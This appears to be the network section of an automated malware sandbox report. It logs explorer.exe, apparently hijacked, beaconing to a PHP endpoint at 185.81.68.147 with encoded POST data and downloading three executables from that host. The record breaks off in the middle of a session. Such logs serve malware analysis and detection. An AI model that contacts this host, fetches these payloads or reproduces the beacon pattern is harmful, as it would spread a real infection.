                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.528753042 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.648437023 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.879736900 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.879847050 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.879914999 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.883287907 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.989937067 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.003132105 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.109638929 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.109772921 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.109808922 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.229559898 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.229659081 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.349467993 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.572005987 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.572170973 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.572223902 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.574057102 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.678531885 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.693749905 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.799061060 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.799216986 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.799293041 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.919109106 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.919336081 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:00.039046049 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.245629072 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:19.046706915 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.256155968 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.256372929 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.256438971 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.257522106 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.364720106 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.377295017 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.484646082 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.484741926 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.484791040 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.604654074 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.604718924 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.725749016 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.121589899 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.121778965 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.121845007 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.123148918 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.224011898 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.242846012 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.343873978 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.343952894 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.343995094 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.463809967 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.463862896 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.583653927 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.963820934 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.964061022 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.964157104 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.965009928 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.067792892 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.084646940 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.187802076 CET8049898185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.187896013 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.187975883 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.307742119 CET8049898185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.307919025 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.427583933 CET8049898185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.619158983 CET8049898185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.619297981 CET8049898185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.619462967 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.620671988 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.724170923 CET4990480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.740365028 CET8049898185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.844439030 CET8049904185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.844567060 CET4990480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.844650030 CET4990480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.964400053 CET8049904185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.964493990 CET4990480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:26.084244967 CET8049904185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.460812092 CET8049904185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.460913897 CET8049904185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.460961103 CET4990480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.461968899 CET4990480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.568113089 CET4990580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.581640959 CET8049904185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.687948942 CET8049905185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.688186884 CET4990580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.688188076 CET4990580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.808206081 CET8049905185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.808394909 CET4990580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.928165913 CET8049905185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.326906919 CET8049905185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.327069998 CET8049905185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.327249050 CET4990580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.328134060 CET4990580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.443042040 CET4991180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.447823048 CET8049905185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.562838078 CET8049911185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.562935114 CET4991180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.562988043 CET4991180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.682693005 CET8049911185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.682809114 CET4991180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.802685976 CET8049911185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.009622097 CET8049911185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.009728909 CET8049911185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.009835958 CET4991180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.014117956 CET4991180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.114795923 CET4991780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.133949995 CET8049911185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.234652042 CET8049917185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.234771013 CET4991780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.234860897 CET4991780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.355139971 CET8049917185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.355340004 CET4991780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:31.475346088 CET8049917185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:32.905642033 CET8049917185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:32.905925035 CET8049917185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:32.906100035 CET4991780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:32.906955957 CET4991780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.020921946 CET4992380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.026722908 CET8049917185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.140908003 CET8049923185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.141158104 CET4992380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.141158104 CET4992380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.261290073 CET8049923185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.261368036 CET4992380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:33.381323099 CET8049923185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:34.599256992 CET8049923185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:52.599701881 CET8049970185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:53.978038073 CET8049970185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:53.978254080 CET8049970185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:53.978302002 CET4997080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:53.980300903 CET4997080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.083767891 CET4997580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.099987030 CET8049970185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.203855991 CET8049975185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.203989983 CET4997580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.204077005 CET4997580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.324033976 CET8049975185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.324280977 CET4997580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:54.444175959 CET8049975185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.660036087 CET8049975185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.660209894 CET8049975185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.660300016 CET4997580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.662123919 CET4997580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.770941973 CET4997880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.781830072 CET8049975185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.890784025 CET8049978185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.890887022 CET4997880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:55.890947104 CET4997880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:56.010818005 CET8049978185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:56.010875940 CET4997880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:56.159161091 CET8049978185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.339330912 CET8049978185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.339411020 CET8049978185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.339467049 CET4997880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.527406931 CET4997880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.630753040 CET4998380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.647295952 CET8049978185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.750797987 CET8049983185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.750942945 CET4998380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.757472038 CET4998380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.877307892 CET8049983185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.877573967 CET4998380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:57.997533083 CET8049983185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.196631908 CET8049983185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.196747065 CET8049983185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.197674990 CET4998380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.197675943 CET4998380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.302308083 CET4998980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.317567110 CET8049983185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.422125101 CET8049989185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.422228098 CET4998980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.422288895 CET4998980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.542359114 CET8049989185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.542449951 CET4998980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:59.662427902 CET8049989185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.251880884 CET8049989185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.252120972 CET8049989185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.252201080 CET4998980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.253031969 CET4998980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.364794016 CET4999580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.372790098 CET8049989185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.484947920 CET8049995185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.486850023 CET4999580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.486850977 CET4999580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.607000113 CET8049995185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.610707045 CET4999580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:01.730735064 CET8049995185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:03.092776060 CET8049995185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:03.092820883 CET8049995185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:14:03.093055964 CET4999580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:05.473268986 CET4999580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:14:05.593532085 CET8049995185.81.68.147192.168.2.5
                                                                                                                                                                                                                        • 185.81.68.147
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        185.81.68.147   80                1028  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 15, 2024 09:12:01.773372889 CET  258  OUT  POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 15, 2024 09:12:03.104958057 CET  257  IN  HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:02 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 40
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 38 36 30 30 38 36 65 33 62 30 37 63 30 38 63 62 35 30 33 64 39 63 37 61 62 31 64 35 36 39 36 32 31 34 32 33 38 37 66 37
Data Ascii: 860086e3b07c08cb503d9c7ab1d56962142387f7


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49705        185.81.68.147   80                1028  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 15, 2024 09:12:03.236634016 CET  278  OUT  POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 37
Dec 15, 2024 09:12:03.356776953 CET  37  OUT  Data Raw: 5a 59 44 4c 0a 18 54 4f 53 00 4b 53 4c 08 1f 52 49 71 7f 22 76 2d 64 4c 32 72 18 54 5a 5f 59 5c 42 48 03 4f 01
Data Ascii: ZYDLTOSKSLRIq"v-dL2rTZ_Y\BHO
Dec 15, 2024 09:12:04.842247009 CET  216  IN  HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:04.964103937 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:05.084320068 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:06.407574892 CET | 315 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:05 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 98
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 4a 58 44 4c 46 5f 1c 4d 01 0f 56 1e 00 52 4c 03 08 1d 55 0d 54 18 12 11 56 4a 50 4e 5c 3b 38 01 48 5a 47 4c 47 5c 18 17 07 08 05 16 0e 54 1d 54 08 19 52 04 0f 4c 18 4d 1e 56 1c 5c 6e 3d 50 1e 59 10 41 46 03 19 1d 00 0c 07 1d 00 06 48 01 00 18 01 04 0f 19 10 43 06 51 43 06 1e 5d 1b 07 38 3a
Data Ascii: JXDLF_MVRLUTVJPN\;8HZGLG\TTRLMV\n=PYAFHCQC]8:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:06.531620979 CET | 232 | OUT | GET /ssg.exe HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 15, 2024 09:12:07.859174013 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:07 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
ETag: "4b200-629107cd804d2"
Accept-Ranges: bytes
Content-Length: 307712
Connection: close
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:09.172729969 CET | 231 | OUT | GET /zx.exe HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 15, 2024 09:12:10.502324104 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:09 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 14 Dec 2024 13:10:00 GMT
ETag: "5a4536-6293aaa2cd4c8"
Accept-Ranges: bytes
Content-Length: 5915958
Connection: close
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49720 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:20.651216984 CET | 235 | OUT | GET /update.exe HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 15, 2024 09:12:21.983059883 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:21 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 15 Dec 2024 06:09:39 GMT
ETag: "4ba00-62948e8bd5049"
Accept-Ranges: bytes
Content-Length: 309760
Connection: close
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49727 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:23.235296965 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:23.355178118 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:24.880692959 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49733 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:25.110251904 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:25.233230114 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:26.561175108 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:25 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49739 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:26.799380064 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
